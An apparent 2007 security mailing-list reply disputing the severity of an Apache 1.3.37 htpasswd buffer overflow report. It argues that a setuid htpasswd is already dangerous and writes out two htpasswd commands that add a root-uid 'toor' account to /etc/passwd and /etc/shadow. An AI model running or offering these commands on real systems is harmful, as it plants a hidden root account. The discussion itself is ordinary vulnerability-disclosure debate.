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Re: Apache 1.3.37 htpasswd buffer overflow vulnerability
From: Andrew Farmer <andfarm () gmail com>
Date: Tue, 2 Jan 2007 15:45:45 -0800

On 02 Jan 07, at 12:20, Matias Soler wrote:
Synopsis: Apache 1.3.37 htpasswd buffer overflow vulnerability
Version: 1.3.37 (latest 1.3.xx)

Product
=======
Apache htpasswd utility

Issue
=====
A buffer overflow vilnerability has been found, it is dangerous  
only on
environment where the binary is suid root.

If htpasswd is setuid, then one could just as easily:

   htpasswd -bp /etc/passwd toor x:0:0:toor::/:/bin/sh
   htpasswd -bp /etc/shadow toor xxa8fjDF6WqBA:0:0:99999:7:::

and get root. (Or any number of things - sudoers, crontab, SSH keys -  
take your pick.)

It's possible that this buffer overflow may be significant in very  
limited circumstances - if the utility is executed from a web  
application, perhaps. However, this seems like a rather limited-scope  
issue.

-- Andrew Farmer

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